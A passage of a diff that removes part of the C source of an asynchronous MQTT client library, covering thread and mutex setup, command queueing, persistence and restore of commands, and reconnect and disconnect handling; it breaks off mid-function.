-#define URI_TCP "tcp://"
-
-#include "VersionInfo.h"
-
-const char *client_timestamp_eye = "MQTTAsyncV3_Timestamp " BUILD_TIMESTAMP;
-const char *client_version_eye = "MQTTAsyncV3_Version " CLIENT_VERSION;
-
-void MQTTAsync_global_init(MQTTAsync_init_options* inits)
-{
-#if defined(OPENSSL)
-	SSLSocket_handleOpensslInit(inits->do_openssl_init);
-#endif
-}
-
-#if !defined(min)
-#define min(a, b) (((a) < (b)) ? (a) : (b))
-#endif
-
-static ClientStates ClientState =
-{
-	CLIENT_VERSION, /* version */
-	NULL /* client list */
-};
-
-ClientStates* bstate = &ClientState;
-
-MQTTProtocol state;
-
-enum MQTTAsync_threadStates
-{
-	STOPPED, STARTING, RUNNING, STOPPING
-};
-
-enum MQTTAsync_threadStates sendThread_state = STOPPED;
-enum MQTTAsync_threadStates receiveThread_state = STOPPED;
-static thread_id_type sendThread_id = 0,
-					receiveThread_id = 0;
-
-#if defined(WIN32) || defined(WIN64)
-static mutex_type mqttasync_mutex = NULL;
-static mutex_type socket_mutex = NULL;
-static mutex_type mqttcommand_mutex = NULL;
-static sem_type send_sem = NULL;
-extern mutex_type stack_mutex;
-extern mutex_type heap_mutex;
-extern mutex_type log_mutex;
-BOOL APIENTRY DllMain(HANDLE hModule,
-					  DWORD  ul_reason_for_call,
-					  LPVOID lpReserved)
-{
-	switch (ul_reason_for_call)
-	{
-		case DLL_PROCESS_ATTACH:
-			Log(TRACE_MAX, -1, "DLL process attach");
-			if (mqttasync_mutex == NULL)
-			{
-				mqttasync_mutex = CreateMutex(NULL, 0, NULL);
-				mqttcommand_mutex = CreateMutex(NULL, 0, NULL);
-				send_sem = CreateEvent(
-		        NULL,               /* default security attributes */
-		        FALSE,              /* manual-reset event? */
-		        FALSE,              /* initial state is nonsignaled */
-		        NULL                /* object name */
-		        );
-				stack_mutex = CreateMutex(NULL, 0, NULL);
-				heap_mutex = CreateMutex(NULL, 0, NULL);
-				log_mutex = CreateMutex(NULL, 0, NULL);
-				socket_mutex = CreateMutex(NULL, 0, NULL);
-			}
-		case DLL_THREAD_ATTACH:
-			Log(TRACE_MAX, -1, "DLL thread attach");
-		case DLL_THREAD_DETACH:
-			Log(TRACE_MAX, -1, "DLL thread detach");
-		case DLL_PROCESS_DETACH:
-			Log(TRACE_MAX, -1, "DLL process detach");
-	}
-	return TRUE;
-}
-#else
-static pthread_mutex_t mqttasync_mutex_store = PTHREAD_MUTEX_INITIALIZER;
-static mutex_type mqttasync_mutex = &mqttasync_mutex_store;
-
-static pthread_mutex_t socket_mutex_store = PTHREAD_MUTEX_INITIALIZER;
-static mutex_type socket_mutex = &socket_mutex_store;
-
-static pthread_mutex_t mqttcommand_mutex_store = PTHREAD_MUTEX_INITIALIZER;
-static mutex_type mqttcommand_mutex = &mqttcommand_mutex_store;
-
-static cond_type_struct send_cond_store = { PTHREAD_COND_INITIALIZER, PTHREAD_MUTEX_INITIALIZER };
-static cond_type send_cond = &send_cond_store;
-
-void MQTTAsync_init(void)
-{
-	pthread_mutexattr_t attr;
-	int rc;
-
-	pthread_mutexattr_init(&attr);
-#if !defined(_WRS_KERNEL)
-	pthread_mutexattr_settype(&attr, PTHREAD_MUTEX_ERRORCHECK);
-#else
-	/* #warning "no pthread_mutexattr_settype" */
-#endif
-	if ((rc = pthread_mutex_init(mqttasync_mutex, &attr)) != 0)
-		printf("MQTTAsync: error %d initializing async_mutex\n", rc);
-	if ((rc = pthread_mutex_init(mqttcommand_mutex, &attr)) != 0)
-		printf("MQTTAsync: error %d initializing command_mutex\n", rc);
-	if ((rc = pthread_mutex_init(socket_mutex, &attr)) != 0)
-		printf("MQTTClient: error %d initializing socket_mutex\n", rc);
-
-	if ((rc = pthread_cond_init(&send_cond->cond, NULL)) != 0)
-		printf("MQTTAsync: error %d initializing send_cond cond\n", rc);
-	if ((rc = pthread_mutex_init(&send_cond->mutex, &attr)) != 0)
-		printf("MQTTAsync: error %d initializing send_cond mutex\n", rc);
-}
-
-#define WINAPI
-#endif
-
-static volatile int initialized = 0;
-static List* handles = NULL;
-static int tostop = 0;
-static List* commands = NULL;
-
-
-#if defined(WIN32) || defined(WIN64)
-#define START_TIME_TYPE DWORD
-START_TIME_TYPE MQTTAsync_start_clock(void)
-{
-	return GetTickCount();
-}
-#elif defined(AIX)
-#define START_TIME_TYPE struct timespec
-START_TIME_TYPE MQTTAsync_start_clock(void)
-{
-	static struct timespec start;
-	clock_gettime(CLOCK_REALTIME, &start);
-	return start;
-}
-#else
-#define START_TIME_TYPE struct timeval
-START_TIME_TYPE MQTTAsync_start_clock(void)
-{
-	static struct timeval start;
-	gettimeofday(&start, NULL);
-	return start;
-}
-#endif
-
-
-#if defined(WIN32) || defined(WIN64)
-long MQTTAsync_elapsed(DWORD milliseconds)
-{
-	return GetTickCount() - milliseconds;
-}
-#elif defined(AIX)
-#define assert(a)
-long MQTTAsync_elapsed(struct timespec start)
-{
-	struct timespec now, res;
-
-	clock_gettime(CLOCK_REALTIME, &now);
-	ntimersub(now, start, res);
-	return (res.tv_sec)*1000L + (res.tv_nsec)/1000000L;
-}
-#else
-long MQTTAsync_elapsed(struct timeval start)
-{
-	struct timeval now, res;
-
-	gettimeofday(&now, NULL);
-	timersub(&now, &start, &res);
-	return (res.tv_sec)*1000 + (res.tv_usec)/1000;
-}
-#endif
-
-
-typedef struct
-{
-	MQTTAsync_message* msg;
-	char* topicName;
-	int topicLen;
-	unsigned int seqno; /* only used on restore */
-} qEntry;
-
-typedef struct
-{
-	int type;
-	MQTTAsync_onSuccess* onSuccess;
-	MQTTAsync_onFailure* onFailure;
-	MQTTAsync_token token;
-	void* context;
-	START_TIME_TYPE start_time;
-	union
-	{
-		struct
-		{
-			int count;
-			char** topics;
-			int* qoss;
-		} sub;
-		struct
-		{
-			int count;
-			char** topics;
-		} unsub;
-		struct
-		{
-			char* destinationName;
-			int payloadlen;
-			void* payload;
-			int qos;
-			int retained;
-		} pub;
-		struct
-		{
-			int internal;
-			int timeout;
-		} dis;
-		struct
-		{
-			int currentURI;
-			int MQTTVersion; /**< current MQTT version being used to connect */
-		} conn;
-	} details;
-} MQTTAsync_command;
-
-
-typedef struct MQTTAsync_struct
-{
-	char* serverURI;
-	int ssl;
-	Clients* c;
-
-	/* "Global", to the client, callback definitions */
-	MQTTAsync_connectionLost* cl;
-	MQTTAsync_messageArrived* ma;
-	MQTTAsync_deliveryComplete* dc;
-	void* context; /* the context to be associated with the main callbacks*/
-
-	MQTTAsync_connected* connected;
-	void* connected_context; /* the context to be associated with the connected callback*/
-
-	/* Each time connect is called, we store the options that were used.  These are reused in
-	   any call to reconnect, or an automatic reconnect attempt */
-	MQTTAsync_command connect;		/* Connect operation properties */
-	MQTTAsync_command disconnect;		/* Disconnect operation properties */
-	MQTTAsync_command* pending_write;       /* Is there a socket write pending? */
-
-	List* responses;
-	unsigned int command_seqno;
-
-	MQTTPacket* pack;
-
-	/* added for offline buffering */
-	MQTTAsync_createOptions* createOptions;
-	int shouldBeConnected;
-
-	/* added for automatic reconnect */
-	int automaticReconnect;
-	int minRetryInterval;
-	int maxRetryInterval;
-	int serverURIcount;
-	char** serverURIs;
-	int connectTimeout;
-
-	int currentInterval;
-	START_TIME_TYPE lastConnectionFailedTime;
-	int retrying;
-	int reconnectNow;
-
-} MQTTAsyncs;
-
-
-typedef struct
-{
-	MQTTAsync_command command;
-	MQTTAsyncs* client;
-	unsigned int seqno; /* only used on restore */
-} MQTTAsync_queuedCommand;
-
-
-static int clientSockCompare(void* a, void* b);
-static void MQTTAsync_lock_mutex(mutex_type amutex);
-static void MQTTAsync_unlock_mutex(mutex_type amutex);
-static int MQTTAsync_checkConn(MQTTAsync_command* command, MQTTAsyncs* client);
-static void MQTTAsync_terminate(void);
-#if !defined(NO_PERSISTENCE)
-static int MQTTAsync_unpersistCommand(MQTTAsync_queuedCommand* qcmd);
-static int MQTTAsync_persistCommand(MQTTAsync_queuedCommand* qcmd);
-static MQTTAsync_queuedCommand* MQTTAsync_restoreCommand(char* buffer, int buflen);
-/*static void MQTTAsync_insertInOrder(List* list, void* content, int size);*/
-static int MQTTAsync_restoreCommands(MQTTAsyncs* client);
-#endif
-static int MQTTAsync_addCommand(MQTTAsync_queuedCommand* command, int command_size);
-static void MQTTAsync_startConnectRetry(MQTTAsyncs* m);
-static void MQTTAsync_checkDisconnect(MQTTAsync handle, MQTTAsync_command* command);
-static void MQTTProtocol_checkPendingWrites(void);
-static void MQTTAsync_freeServerURIs(MQTTAsyncs* m);
-static void MQTTAsync_freeCommand1(MQTTAsync_queuedCommand *command);
-static void MQTTAsync_freeCommand(MQTTAsync_queuedCommand *command);
-static void MQTTAsync_writeComplete(int socket);
-static int MQTTAsync_processCommand(void);
-static void MQTTAsync_checkTimeouts(void);
-static thread_return_type WINAPI MQTTAsync_sendThread(void* n);
-static void MQTTAsync_emptyMessageQueue(Clients* client);
-static void MQTTAsync_removeResponsesAndCommands(MQTTAsyncs* m);
-static int MQTTAsync_completeConnection(MQTTAsyncs* m, MQTTPacket* pack);
-static thread_return_type WINAPI MQTTAsync_receiveThread(void* n);
-static void MQTTAsync_stop(void);
-static void MQTTAsync_closeOnly(Clients* client);
-static void MQTTAsync_closeSession(Clients* client);
-static int clientStructCompare(void* a, void* b);
-static int MQTTAsync_cleanSession(Clients* client);
-static int MQTTAsync_deliverMessage(MQTTAsyncs* m, char* topicName, size_t topicLen, MQTTAsync_message* mm);
-static int MQTTAsync_disconnect1(MQTTAsync handle, const MQTTAsync_disconnectOptions* options, int internal);
-static int MQTTAsync_disconnect_internal(MQTTAsync handle, int timeout);
-static int cmdMessageIDCompare(void* a, void* b);
-static int MQTTAsync_assignMsgId(MQTTAsyncs* m);
-static int MQTTAsync_countBufferedMessages(MQTTAsyncs* m);
-static void MQTTAsync_retry(void);
-static int MQTTAsync_connecting(MQTTAsyncs* m);
-static MQTTPacket* MQTTAsync_cycle(int* sock, unsigned long timeout, int* rc);
-/*static int pubCompare(void* a, void* b);*/
-
-
-void MQTTAsync_sleep(long milliseconds)
-{
-	FUNC_ENTRY;
-#if defined(WIN32) || defined(WIN64)
-	Sleep(milliseconds);
-#else
-	usleep(milliseconds*1000);
-#endif
-	FUNC_EXIT;
-}
-
-
-/**
- * List callback function for comparing clients by socket
- * @param a first integer value
- * @param b second integer value
- * @return boolean indicating whether a and b are equal
- */
-static int clientSockCompare(void* a, void* b)
-{
-	MQTTAsyncs* m = (MQTTAsyncs*)a;
-	return m->c->net.socket == *(int*)b;
-}
-
-
-static void MQTTAsync_lock_mutex(mutex_type amutex)
-{
-	int rc = Thread_lock_mutex(amutex);
-	if (rc != 0)
-		Log(LOG_ERROR, 0, "Error %s locking mutex", strerror(rc));
-}
-
-
-static void MQTTAsync_unlock_mutex(mutex_type amutex)
-{
-	int rc = Thread_unlock_mutex(amutex);
-	if (rc != 0)
-		Log(LOG_ERROR, 0, "Error %s unlocking mutex", strerror(rc));
-}
-
-
-/*
-  Check whether there are any more connect options.  If not then we are finished
-  with connect attempts.
-*/
-static int MQTTAsync_checkConn(MQTTAsync_command* command, MQTTAsyncs* client)
-{
-	int rc;
-
-	FUNC_ENTRY;
-	rc = command->details.conn.currentURI + 1 < client->serverURIcount ||
-		(command->details.conn.MQTTVersion == 4 && client->c->MQTTVersion == MQTTVERSION_DEFAULT);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-int MQTTAsync_createWithOptions(MQTTAsync* handle, const char* serverURI, const char* clientId,
-		int persistence_type, void* persistence_context,  MQTTAsync_createOptions* options)
-{
-	int rc = 0;
-	MQTTAsyncs *m = NULL;
-
-	FUNC_ENTRY;
-	MQTTAsync_lock_mutex(mqttasync_mutex);
-
-	if (serverURI == NULL || clientId == NULL)
-	{
-		rc = MQTTASYNC_NULL_PARAMETER;
-		goto exit;
-	}
-
-	if (!UTF8_validateString(clientId))
-	{
-		rc = MQTTASYNC_BAD_UTF8_STRING;
-		goto exit;
-	}
-
-	if (options && (strncmp(options->struct_id, "MQCO", 4) != 0 || options->struct_version != 0))
-	{
-		rc = MQTTASYNC_BAD_STRUCTURE;
-		goto exit;
-	}
-
-	if (!initialized)
-	{
-		#if defined(HEAP_H)
-			Heap_initialize();
-		#endif
-		Log_initialize((Log_nameValue*)MQTTAsync_getVersionInfo());
-		bstate->clients = ListInitialize();
-		Socket_outInitialize();
-		Socket_setWriteCompleteCallback(MQTTAsync_writeComplete);
-		handles = ListInitialize();
-		commands = ListInitialize();
-#if defined(OPENSSL)
-		SSLSocket_initialize();
-#endif
-		initialized = 1;
-	}
-	m = malloc(sizeof(MQTTAsyncs));
-	*handle = m;
-	memset(m, '\0', sizeof(MQTTAsyncs));
-	if (strncmp(URI_TCP, serverURI, strlen(URI_TCP)) == 0)
-		serverURI += strlen(URI_TCP);
-#if defined(OPENSSL)
-	else if (strncmp(URI_SSL, serverURI, strlen(URI_SSL)) == 0)
-	{
-		serverURI += strlen(URI_SSL);
-		m->ssl = 1;
-	}
-#endif
-	m->serverURI = MQTTStrdup(serverURI);
-	m->responses = ListInitialize();
-	ListAppend(handles, m, sizeof(MQTTAsyncs));
-
-	m->c = malloc(sizeof(Clients));
-	memset(m->c, '\0', sizeof(Clients));
-	m->c->context = m;
-	m->c->outboundMsgs = ListInitialize();
-	m->c->inboundMsgs = ListInitialize();
-	m->c->messageQueue = ListInitialize();
-	m->c->clientID = MQTTStrdup(clientId);
-
-	m->shouldBeConnected = 0;
-	if (options)
-	{
-		m->createOptions = malloc(sizeof(MQTTAsync_createOptions));
-		memcpy(m->createOptions, options, sizeof(MQTTAsync_createOptions));
-	}
-
-#if !defined(NO_PERSISTENCE)
-	rc = MQTTPersistence_create(&(m->c->persistence), persistence_type, persistence_context);
-	if (rc == 0)
-	{
-		rc = MQTTPersistence_initialize(m->c, m->serverURI);
-		if (rc == 0)
-		{
-			MQTTAsync_restoreCommands(m);
-			MQTTPersistence_restoreMessageQueue(m->c);
-		}
-	}
-#endif
-	ListAppend(bstate->clients, m->c, sizeof(Clients) + 3*sizeof(List));
-
-exit:
-	MQTTAsync_unlock_mutex(mqttasync_mutex);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-int MQTTAsync_create(MQTTAsync* handle, const char* serverURI, const char* clientId,
-		int persistence_type, void* persistence_context)
-{
-	return MQTTAsync_createWithOptions(handle, serverURI, clientId, persistence_type,
-		persistence_context, NULL);
-}
-
-
-static void MQTTAsync_terminate(void)
-{
-	FUNC_ENTRY;
-	MQTTAsync_stop();
-	if (initialized)
-	{
-		ListElement* elem = NULL;
-		ListFree(bstate->clients);
-		ListFree(handles);
-		while (ListNextElement(commands, &elem))
-			MQTTAsync_freeCommand1((MQTTAsync_queuedCommand*)(elem->content));
-		ListFree(commands);
-		handles = NULL;
-		Socket_outTerminate();
-#if defined(OPENSSL)
-		SSLSocket_terminate();
-#endif
-		#if defined(HEAP_H)
-			Heap_terminate();
-		#endif
-		Log_terminate();
-		initialized = 0;
-	}
-	FUNC_EXIT;
-}
-
-
-#if !defined(NO_PERSISTENCE)
-static int MQTTAsync_unpersistCommand(MQTTAsync_queuedCommand* qcmd)
-{
-	int rc = 0;
-	char key[PERSISTENCE_MAX_KEY_LENGTH + 1];
-
-	FUNC_ENTRY;
-	sprintf(key, "%s%u", PERSISTENCE_COMMAND_KEY, qcmd->seqno);
-	if ((rc = qcmd->client->c->persistence->premove(qcmd->client->c->phandle, key)) != 0)
-		Log(LOG_ERROR, 0, "Error %d removing command from persistence", rc);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-static int MQTTAsync_persistCommand(MQTTAsync_queuedCommand* qcmd)
-{
-	int rc = 0;
-	MQTTAsyncs* aclient = qcmd->client;
-	MQTTAsync_command* command = &qcmd->command;
-	int* lens = NULL;
-	void** bufs = NULL;
-	int bufindex = 0, i, nbufs = 0;
-	char key[PERSISTENCE_MAX_KEY_LENGTH + 1];
-
-	FUNC_ENTRY;
-	switch (command->type)
-	{
-		case SUBSCRIBE:
-			nbufs = 3 + (command->details.sub.count * 2);
-
-			lens = (int*)malloc(nbufs * sizeof(int));
-			bufs = malloc(nbufs * sizeof(char *));
-
-			bufs[bufindex] = &command->type;
-			lens[bufindex++] = sizeof(command->type);
-
-			bufs[bufindex] = &command->token;
-			lens[bufindex++] = sizeof(command->token);
-
-			bufs[bufindex] = &command->details.sub.count;
-			lens[bufindex++] = sizeof(command->details.sub.count);
-
-			for (i = 0; i < command->details.sub.count; ++i)
-			{
-				bufs[bufindex] = command->details.sub.topics[i];
-				lens[bufindex++] = (int)strlen(command->details.sub.topics[i]) + 1;
-				bufs[bufindex] = &command->details.sub.qoss[i];
-				lens[bufindex++] = sizeof(command->details.sub.qoss[i]);
-			}
-			sprintf(key, "%s%d", PERSISTENCE_COMMAND_KEY, ++aclient->command_seqno);
-			break;
-
-		case UNSUBSCRIBE:
-			nbufs = 3 + command->details.unsub.count;
-
-			lens = (int*)malloc(nbufs * sizeof(int));
-			bufs = malloc(nbufs * sizeof(char *));
-
-			bufs[bufindex] = &command->type;
-			lens[bufindex++] = sizeof(command->type);
-
-			bufs[bufindex] = &command->token;
-			lens[bufindex++] = sizeof(command->token);
-
-			bufs[bufindex] = &command->details.unsub.count;
-			lens[bufindex++] = sizeof(command->details.unsub.count);
-
-			for (i = 0; i < command->details.unsub.count; ++i)
-			{
-				bufs[bufindex] = command->details.unsub.topics[i];
-				lens[bufindex++] = (int)strlen(command->details.unsub.topics[i]) + 1;
-			}
-			sprintf(key, "%s%d", PERSISTENCE_COMMAND_KEY, ++aclient->command_seqno);
-			break;
-
-		case PUBLISH:
-			nbufs = 7;
-
-			lens = (int*)malloc(nbufs * sizeof(int));
-			bufs = malloc(nbufs * sizeof(char *));
-
-			bufs[bufindex] = &command->type;
-			lens[bufindex++] = sizeof(command->type);
-
-			bufs[bufindex] = &command->token;
-			lens[bufindex++] = sizeof(command->token);
-
-			bufs[bufindex] = command->details.pub.destinationName;
-			lens[bufindex++] = (int)strlen(command->details.pub.destinationName) + 1;
-
-			bufs[bufindex] = &command->details.pub.payloadlen;
-			lens[bufindex++] = sizeof(command->details.pub.payloadlen);
-
-			bufs[bufindex] = command->details.pub.payload;
-			lens[bufindex++] = command->details.pub.payloadlen;
-
-			bufs[bufindex] = &command->details.pub.qos;
-			lens[bufindex++] = sizeof(command->details.pub.qos);
-
-			bufs[bufindex] = &command->details.pub.retained;
-			lens[bufindex++] = sizeof(command->details.pub.retained);
-
-			sprintf(key, "%s%d", PERSISTENCE_COMMAND_KEY, ++aclient->command_seqno);
-			break;
-	}
-	if (nbufs > 0)
-	{
-		if ((rc = aclient->c->persistence->pput(aclient->c->phandle, key, nbufs, (char**)bufs, lens)) != 0)
-			Log(LOG_ERROR, 0, "Error persisting command, rc %d", rc);
-		qcmd->seqno = aclient->command_seqno;
-	}
-	if (lens)
-		free(lens);
-	if (bufs)
-		free(bufs);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-static MQTTAsync_queuedCommand* MQTTAsync_restoreCommand(char* buffer, int buflen)
-{
-	MQTTAsync_command* command = NULL;
-	MQTTAsync_queuedCommand* qcommand = NULL;
-	char* ptr = buffer;
-	int i;
-	size_t data_size;
-
-	FUNC_ENTRY;
-	qcommand = malloc(sizeof(MQTTAsync_queuedCommand));
-	memset(qcommand, '\0', sizeof(MQTTAsync_queuedCommand));
-	command = &qcommand->command;
-
-	command->type = *(int*)ptr;
-	ptr += sizeof(int);
-
-	command->token = *(MQTTAsync_token*)ptr;
-	ptr += sizeof(MQTTAsync_token);
-
-	switch (command->type)
-	{
-		case SUBSCRIBE:
-			command->details.sub.count = *(int*)ptr;
-			ptr += sizeof(int);
-			
-			if (command->details.sub.count > 0)
-			{
-					command->details.sub.topics = (char **)malloc(sizeof(char *) * command->details.sub.count);
-					command->details.sub.qoss = (int *)malloc(sizeof(int) * command->details.sub.count);
-			}
-
-			for (i = 0; i < command->details.sub.count; ++i)
-			{
-				data_size = strlen(ptr) + 1;
-
-				command->details.sub.topics[i] = malloc(data_size);
-				strcpy(command->details.sub.topics[i], ptr);
-				ptr += data_size;
-
-				command->details.sub.qoss[i] = *(int*)ptr;
-				ptr += sizeof(int);
-			}
-			break;
-
-		case UNSUBSCRIBE:
-			command->details.unsub.count = *(int*)ptr;
-			ptr += sizeof(int);
-			
-			if (command->details.unsub.count > 0)
-			{
-					command->details.unsub.topics = (char **)malloc(sizeof(char *) * command->details.unsub.count);					
-			}
-
-			for (i = 0; i < command->details.unsub.count; ++i)
-			{
-				data_size = strlen(ptr) + 1;
-
-				command->details.unsub.topics[i] = malloc(data_size);
-				strcpy(command->details.unsub.topics[i], ptr);
-				ptr += data_size;
-			}
-			break;
-
-		case PUBLISH:
-			data_size = strlen(ptr) + 1;
-			command->details.pub.destinationName = malloc(data_size);
-			strcpy(command->details.pub.destinationName, ptr);
-			ptr += data_size;
-
-			command->details.pub.payloadlen = *(int*)ptr;
-			ptr += sizeof(int);
-
-			data_size = command->details.pub.payloadlen;
-			command->details.pub.payload = malloc(data_size);
-			memcpy(command->details.pub.payload, ptr, data_size);
-			ptr += data_size;
-
-			command->details.pub.qos = *(int*)ptr;
-			ptr += sizeof(int);
-
-			command->details.pub.retained = *(int*)ptr;
-			ptr += sizeof(int);
-			break;
-
-		default:
-			free(qcommand);
-			qcommand = NULL;
-
-	}
-
-	FUNC_EXIT;
-	return qcommand;
-}
-
-/*
-static void MQTTAsync_insertInOrder(List* list, void* content, int size)
-{
-	ListElement* index = NULL;
-	ListElement* current = NULL;
-
-	FUNC_ENTRY;
-	while (ListNextElement(list, &current) != NULL && index == NULL)
-	{
-		if (((MQTTAsync_queuedCommand*)content)->seqno < ((MQTTAsync_queuedCommand*)current->content)->seqno)
-			index = current;
-	}
-
-	ListInsert(list, content, size, index);
-	FUNC_EXIT;
-}*/
-
-
-static int MQTTAsync_restoreCommands(MQTTAsyncs* client)
-{
-	int rc = 0;
-	char **msgkeys;
-	int nkeys;
-	int i = 0;
-	Clients* c = client->c;
-	int commands_restored = 0;
-
-	FUNC_ENTRY;
-	if (c->persistence && (rc = c->persistence->pkeys(c->phandle, &msgkeys, &nkeys)) == 0)
-	{
-		while (rc == 0 && i < nkeys)
-		{
-			char *buffer = NULL;
-			int buflen;
-
-			if (strncmp(msgkeys[i], PERSISTENCE_COMMAND_KEY, strlen(PERSISTENCE_COMMAND_KEY)) != 0)
-			{
-				;
-			}
-			else if ((rc = c->persistence->pget(c->phandle, msgkeys[i], &buffer, &buflen)) == 0)
-			{
-				MQTTAsync_queuedCommand* cmd = MQTTAsync_restoreCommand(buffer, buflen);
-
-				if (cmd)
-				{
-					cmd->client = client;
-					cmd->seqno = atoi(msgkeys[i]+2);
-					MQTTPersistence_insertInOrder(commands, cmd, sizeof(MQTTAsync_queuedCommand));
-					free(buffer);
-					client->command_seqno = max(client->command_seqno, cmd->seqno);
-					commands_restored++;
-				}
-			}
-			if (msgkeys[i])
-				free(msgkeys[i]);
-			i++;
-		}
-		if (msgkeys != NULL)
-			free(msgkeys);
-	}
-	Log(TRACE_MINIMUM, -1, "%d commands restored for client %s", commands_restored, c->clientID);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-#endif
-
-
-static int MQTTAsync_addCommand(MQTTAsync_queuedCommand* command, int command_size)
-{
-	int rc = 0;
-
-	FUNC_ENTRY;
-	MQTTAsync_lock_mutex(mqttcommand_mutex);
-	/* Don't set start time if the connect command is already in process #218 */
-	if ((command->command.type != CONNECT) || (command->client->c->connect_state == 0))
-		command->command.start_time = MQTTAsync_start_clock();
-	if (command->command.type == CONNECT ||
-		(command->command.type == DISCONNECT && command->command.details.dis.internal))
-	{
-		MQTTAsync_queuedCommand* head = NULL;
-
-		if (commands->first)
-			head = (MQTTAsync_queuedCommand*)(commands->first->content);
-
-		if (head != NULL && head->client == command->client && head->command.type == command->command.type)
-			MQTTAsync_freeCommand(command); /* ignore duplicate connect or disconnect command */
-		else
-			ListInsert(commands, command, command_size, commands->first); /* add to the head of the list */
-	}
-	else
-	{
-		ListAppend(commands, command, command_size);
-#if !defined(NO_PERSISTENCE)
-		if (command->client->c->persistence)
-			MQTTAsync_persistCommand(command);
-#endif
-	}
-	MQTTAsync_unlock_mutex(mqttcommand_mutex);
-#if !defined(WIN32) && !defined(WIN64)
-	rc = Thread_signal_cond(send_cond);
-	if (rc != 0)
-		Log(LOG_ERROR, 0, "Error %d from signal cond", rc);
-#else
-	if (!Thread_check_sem(send_sem))
-		Thread_post_sem(send_sem);
-#endif
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-static void MQTTAsync_startConnectRetry(MQTTAsyncs* m)
-{
-	if (m->automaticReconnect && m->shouldBeConnected)
-	{
-		m->lastConnectionFailedTime = MQTTAsync_start_clock();
-		if (m->retrying)
-			m->currentInterval = min(m->currentInterval * 2, m->maxRetryInterval);
-		else
-		{
-			m->currentInterval = m->minRetryInterval;
-			m->retrying = 1;
-		}
-	}
-}
-
-
-int MQTTAsync_reconnect(MQTTAsync handle)
-{
-	int rc = MQTTASYNC_FAILURE;
-	MQTTAsyncs* m = handle;
-
-	FUNC_ENTRY;
-	MQTTAsync_lock_mutex(mqttasync_mutex);
-
-	if (m->automaticReconnect)
-	{
-		if (m->shouldBeConnected)
-		{
-			m->reconnectNow = 1;
-	  		if (m->retrying == 0)
-	  		{
-	  			m->currentInterval = m->minRetryInterval;
-	  			m->retrying = 1;
-	  		}
-	  		rc = MQTTASYNC_SUCCESS;
-		}
-	}
-	else
-	{
-		/* to reconnect, put the connect command to the head of the command queue */
-		MQTTAsync_queuedCommand* conn = malloc(sizeof(MQTTAsync_queuedCommand));
-		memset(conn, '\0', sizeof(MQTTAsync_queuedCommand));
-		conn->client = m;
-		conn->command = m->connect;
-		/* make sure that the version attempts are restarted */
-		if (m->c->MQTTVersion == MQTTVERSION_DEFAULT)
-	  		conn->command.details.conn.MQTTVersion = 0;
-		MQTTAsync_addCommand(conn, sizeof(m->connect));
-	  	rc = MQTTASYNC_SUCCESS;
-	}
-
-	MQTTAsync_unlock_mutex(mqttasync_mutex);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-static void MQTTAsync_checkDisconnect(MQTTAsync handle, MQTTAsync_command* command)
-{
-	MQTTAsyncs* m = handle;
-
-	FUNC_ENTRY;
-	/* wait for all inflight message flows to finish, up to timeout */;
-	if (m->c->outboundMsgs->count == 0 || MQTTAsync_elapsed(command->start_time) >= command->details.dis.timeout)
-	{
-		int was_connected = m->c->connected;
-		MQTTAsync_closeSession(m->c);
-		if (command->details.dis.internal)
-		{
-			if (m->cl && was_connected)
-			{
-				Log(TRACE_MIN, -1, "Calling connectionLost for client %s", m->c->clientID);
-				(*(m->cl))(m->context, NULL);
-			}
-			MQTTAsync_startConnectRetry(m);
-		}
-		else if (command->onSuccess)
-		{
-			Log(TRACE_MIN, -1, "Calling disconnect complete for client %s", m->c->clientID);
-			(*(command->onSuccess))(command->context, NULL);
-		}
-	}
-	FUNC_EXIT;
-}
-
-
-/**
- * See if any pending writes have been completed, and cleanup if so.
- * Cleaning up means removing any publication data that was stored because the write did
- * not originally complete.
- */
-static void MQTTProtocol_checkPendingWrites(void)
-{
-	FUNC_ENTRY;
-	if (state.pending_writes.count > 0)
-	{
-		ListElement* le = state.pending_writes.first;
-		while (le)
-		{
-			if (Socket_noPendingWrites(((pending_write*)(le->content))->socket))
-			{
-				MQTTProtocol_removePublication(((pending_write*)(le->content))->p);
-				state.pending_writes.current = le;
-				ListRemove(&(state.pending_writes), le->content); /* does NextElement itself */
-				le = state.pending_writes.current;
-			}
-			else
-				ListNextElement(&(state.pending_writes), &le);
-		}
-	}
-	FUNC_EXIT;
-}
-
-
-static void MQTTAsync_freeServerURIs(MQTTAsyncs* m)
-{
-	int i;
-
-	for (i = 0; i < m->serverURIcount; ++i)
-		free(m->serverURIs[i]);
-	if (m->serverURIs)
-		free(m->serverURIs);
-}
-
-
-static void MQTTAsync_freeCommand1(MQTTAsync_queuedCommand *command)
-{
-	if (command->command.type == SUBSCRIBE)
-	{
-		int i;
-
-		for (i = 0; i < command->command.details.sub.count; i++)
-			free(command->command.details.sub.topics[i]);
-
-		free(command->command.details.sub.topics);
-		free(command->command.details.sub.qoss);
-	}
-	else if (command->command.type == UNSUBSCRIBE)
-	{
-		int i;
-
-		for (i = 0; i < command->command.details.unsub.count; i++)
-			free(command->command.details.unsub.topics[i]);
-
-		free(command->command.details.unsub.topics);
-	}
-	else if (command->command.type == PUBLISH)
-	{
-		/* qos 1 and 2 topics are freed in the protocol code when the flows are completed */
-		if (command->command.details.pub.destinationName)
-			free(command->command.details.pub.destinationName);
-		free(command->command.details.pub.payload);
-	}
-}
-
-static void MQTTAsync_freeCommand(MQTTAsync_queuedCommand *command)
-{
-	MQTTAsync_freeCommand1(command);
-	free(command);
-}
-
-
-static void MQTTAsync_writeComplete(int socket)
-{
-	ListElement* found = NULL;
-
-	FUNC_ENTRY;
-	/* a partial write is now complete for a socket - this will be on a publish*/
-
-	MQTTProtocol_checkPendingWrites();
-
-	/* find the client using this socket */
-	if ((found = ListFindItem(handles, &socket, clientSockCompare)) != NULL)
-	{
-		MQTTAsyncs* m = (MQTTAsyncs*)(found->content);
-
-		time(&(m->c->net.lastSent));
-
-		/* see if there is a pending write flagged */
-		if (m->pending_write)
-		{
-			ListElement* cur_response = NULL;
-			MQTTAsync_command* command = m->pending_write;
-			MQTTAsync_queuedCommand* com = NULL;
-
-			while (ListNextElement(m->responses, &cur_response))
-			{
-				com = (MQTTAsync_queuedCommand*)(cur_response->content);
-				if (com->client->pending_write == m->pending_write)
-					break;
-			}
-
